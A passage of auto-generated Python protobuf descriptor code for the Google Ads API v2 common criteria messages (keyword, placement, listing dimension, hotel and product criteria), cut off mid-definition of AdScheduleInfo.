dot_googleads__v2_dot_proto_dot_enums_dot_listing__custom__attribute__index__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_listing__group__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_location__group__radius__units__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_minute__of__hour__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_parental__status__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_preferred__content__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__bidding__category__level__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__channel__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__channel__exclusivity__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__condition__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__type__level__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_proximity__radius__units__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_webpage__condition__operand__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_webpage__condition__operator__pb2.DESCRIPTOR,google_dot_protobuf_dot_wrappers__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_KEYWORDINFO = _descriptor.Descriptor(
name='KeywordInfo',
full_name='google.ads.googleads.v2.common.KeywordInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='text', full_name='google.ads.googleads.v2.common.KeywordInfo.text', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='match_type', full_name='google.ads.googleads.v2.common.KeywordInfo.match_type', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1675,
serialized_end=1822,
)
_PLACEMENTINFO = _descriptor.Descriptor(
name='PlacementInfo',
full_name='google.ads.googleads.v2.common.PlacementInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='url', full_name='google.ads.googleads.v2.common.PlacementInfo.url', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1824,
serialized_end=1882,
)
_MOBILEAPPCATEGORYINFO = _descriptor.Descriptor(
name='MobileAppCategoryInfo',
full_name='google.ads.googleads.v2.common.MobileAppCategoryInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='mobile_app_category_constant', full_name='google.ads.googleads.v2.common.MobileAppCategoryInfo.mobile_app_category_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1884,
serialized_end=1975,
)
_MOBILEAPPLICATIONINFO = _descriptor.Descriptor(
name='MobileApplicationInfo',
full_name='google.ads.googleads.v2.common.MobileApplicationInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='app_id', full_name='google.ads.googleads.v2.common.MobileApplicationInfo.app_id', index=0,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='google.ads.googleads.v2.common.MobileApplicationInfo.name', index=1,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1977,
serialized_end=2090,
)
_LOCATIONINFO = _descriptor.Descriptor(
name='LocationInfo',
full_name='google.ads.googleads.v2.common.LocationInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='geo_target_constant', full_name='google.ads.googleads.v2.common.LocationInfo.geo_target_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2092,
serialized_end=2165,
)
_DEVICEINFO = _descriptor.Descriptor(
name='DeviceInfo',
full_name='google.ads.googleads.v2.common.DeviceInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.DeviceInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2167,
serialized_end=2243,
)
_PREFERREDCONTENTINFO = _descriptor.Descriptor(
name='PreferredContentInfo',
full_name='google.ads.googleads.v2.common.PreferredContentInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.PreferredContentInfo.type', index=0,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2245,
serialized_end=2359,
)
_LISTINGGROUPINFO = _descriptor.Descriptor(
name='ListingGroupInfo',
full_name='google.ads.googleads.v2.common.ListingGroupInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.ListingGroupInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='case_value', full_name='google.ads.googleads.v2.common.ListingGroupInfo.case_value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='parent_ad_group_criterion', full_name='google.ads.googleads.v2.common.ListingGroupInfo.parent_ad_group_criterion', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2362,
serialized_end=2603,
)
_LISTINGSCOPEINFO = _descriptor.Descriptor(
name='ListingScopeInfo',
full_name='google.ads.googleads.v2.common.ListingScopeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='dimensions', full_name='google.ads.googleads.v2.common.ListingScopeInfo.dimensions', index=0,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2605,
serialized_end=2697,
)
_LISTINGDIMENSIONINFO = _descriptor.Descriptor(
name='ListingDimensionInfo',
full_name='google.ads.googleads.v2.common.ListingDimensionInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='listing_brand', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.listing_brand', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='hotel_id', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.hotel_id', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='hotel_class', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.hotel_class', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='hotel_country_region', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.hotel_country_region', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='hotel_state', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.hotel_state', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='hotel_city', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.hotel_city', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='listing_custom_attribute', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.listing_custom_attribute', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product_bidding_category', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.product_bidding_category', index=7,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product_channel', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.product_channel', index=8,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product_channel_exclusivity', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.product_channel_exclusivity', index=9,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product_condition', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.product_condition', index=10,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product_item_id', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.product_item_id', index=11,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product_type', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.product_type', index=12,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='unknown_listing_dimension', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.unknown_listing_dimension', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='dimension', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.dimension',
index=0, containing_type=None, fields=[]),
],
serialized_start=2700,
serialized_end=3879,
)
_LISTINGBRANDINFO = _descriptor.Descriptor(
name='ListingBrandInfo',
full_name='google.ads.googleads.v2.common.ListingBrandInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='google.ads.googleads.v2.common.ListingBrandInfo.value', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3881,
serialized_end=3944,
)
_HOTELIDINFO = _descriptor.Descriptor(
name='HotelIdInfo',
full_name='google.ads.googleads.v2.common.HotelIdInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='google.ads.googleads.v2.common.HotelIdInfo.value', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3946,
serialized_end=4004,
)
_HOTELCLASSINFO = _descriptor.Descriptor(
name='HotelClassInfo',
full_name='google.ads.googleads.v2.common.HotelClassInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='google.ads.googleads.v2.common.HotelClassInfo.value', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4006,
serialized_end=4066,
)
_HOTELCOUNTRYREGIONINFO = _descriptor.Descriptor(
name='HotelCountryRegionInfo',
full_name='google.ads.googleads.v2.common.HotelCountryRegionInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='country_region_criterion', full_name='google.ads.googleads.v2.common.HotelCountryRegionInfo.country_region_criterion', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4068,
serialized_end=4156,
)
_HOTELSTATEINFO = _descriptor.Descriptor(
name='HotelStateInfo',
full_name='google.ads.googleads.v2.common.HotelStateInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='state_criterion', full_name='google.ads.googleads.v2.common.HotelStateInfo.state_criterion', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4158,
serialized_end=4229,
)
_HOTELCITYINFO = _descriptor.Descriptor(
name='HotelCityInfo',
full_name='google.ads.googleads.v2.common.HotelCityInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='city_criterion', full_name='google.ads.googleads.v2.common.HotelCityInfo.city_criterion', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4231,
serialized_end=4300,
)
_LISTINGCUSTOMATTRIBUTEINFO = _descriptor.Descriptor(
name='ListingCustomAttributeInfo',
full_name='google.ads.googleads.v2.common.ListingCustomAttributeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='google.ads.googleads.v2.common.ListingCustomAttributeInfo.value', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='index', full_name='google.ads.googleads.v2.common.ListingCustomAttributeInfo.index', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4303,
serialized_end=4483,
)
_PRODUCTBIDDINGCATEGORYINFO = _descriptor.Descriptor(
name='ProductBiddingCategoryInfo',
full_name='google.ads.googleads.v2.common.ProductBiddingCategoryInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='google.ads.googleads.v2.common.ProductBiddingCategoryInfo.id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='country_code', full_name='google.ads.googleads.v2.common.ProductBiddingCategoryInfo.country_code', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='level', full_name='google.ads.googleads.v2.common.ProductBiddingCategoryInfo.level', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4486,
serialized_end=4714,
)
_PRODUCTCHANNELINFO = _descriptor.Descriptor(
name='ProductChannelInfo',
full_name='google.ads.googleads.v2.common.ProductChannelInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='channel', full_name='google.ads.googleads.v2.common.ProductChannelInfo.channel', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4716,
serialized_end=4819,
)
_PRODUCTCHANNELEXCLUSIVITYINFO = _descriptor.Descriptor(
name='ProductChannelExclusivityInfo',
full_name='google.ads.googleads.v2.common.ProductChannelExclusivityInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='channel_exclusivity', full_name='google.ads.googleads.v2.common.ProductChannelExclusivityInfo.channel_exclusivity', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4822,
serialized_end=4970,
)
_PRODUCTCONDITIONINFO = _descriptor.Descriptor(
name='ProductConditionInfo',
full_name='google.ads.googleads.v2.common.ProductConditionInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='condition', full_name='google.ads.googleads.v2.common.ProductConditionInfo.condition', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4972,
serialized_end=5083,
)
_PRODUCTITEMIDINFO = _descriptor.Descriptor(
name='ProductItemIdInfo',
full_name='google.ads.googleads.v2.common.ProductItemIdInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='google.ads.googleads.v2.common.ProductItemIdInfo.value', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5085,
serialized_end=5149,
)
_PRODUCTTYPEINFO = _descriptor.Descriptor(
name='ProductTypeInfo',
full_name='google.ads.googleads.v2.common.ProductTypeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='google.ads.googleads.v2.common.ProductTypeInfo.value', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='level', full_name='google.ads.googleads.v2.common.ProductTypeInfo.level', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5152,
serialized_end=5299,
)
_UNKNOWNLISTINGDIMENSIONINFO = _descriptor.Descriptor(
name='UnknownListingDimensionInfo',
full_name='google.ads.googleads.v2.common.UnknownListingDimensionInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5301,
serialized_end=5330,
)
_HOTELDATESELECTIONTYPEINFO = _descriptor.Descriptor(
name='HotelDateSelectionTypeInfo',
full_name='google.ads.googleads.v2.common.HotelDateSelectionTypeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.HotelDateSelectionTypeInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5332,
serialized_end=5456,
)
_HOTELADVANCEBOOKINGWINDOWINFO = _descriptor.Descriptor(
name='HotelAdvanceBookingWindowInfo',
full_name='google.ads.googleads.v2.common.HotelAdvanceBookingWindowInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='min_days', full_name='google.ads.googleads.v2.common.HotelAdvanceBookingWindowInfo.min_days', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_days', full_name='google.ads.googleads.v2.common.HotelAdvanceBookingWindowInfo.max_days', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5458,
serialized_end=5583,
)
_HOTELLENGTHOFSTAYINFO = _descriptor.Descriptor(
name='HotelLengthOfStayInfo',
full_name='google.ads.googleads.v2.common.HotelLengthOfStayInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='min_nights', full_name='google.ads.googleads.v2.common.HotelLengthOfStayInfo.min_nights', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_nights', full_name='google.ads.googleads.v2.common.HotelLengthOfStayInfo.max_nights', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5585,
serialized_end=5706,
)
_HOTELCHECKINDAYINFO = _descriptor.Descriptor(
name='HotelCheckInDayInfo',
full_name='google.ads.googleads.v2.common.HotelCheckInDayInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='day_of_week', full_name='google.ads.googleads.v2.common.HotelCheckInDayInfo.day_of_week', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5708,
serialized_end=5806,
)
_INTERACTIONTYPEINFO = _descriptor.Descriptor(
name='InteractionTypeInfo',
full_name='google.ads.googleads.v2.common.InteractionTypeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.InteractionTypeInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5808,
serialized_end=5911,
)
_ADSCHEDULEINFO = _descriptor.Descriptor(
name='AdScheduleInfo',
full_name='google.ads.googleads.v2.common.AdScheduleInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='start_minute', full_name='google.ads.googleads.v2.common.AdScheduleInfo.start_minute', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
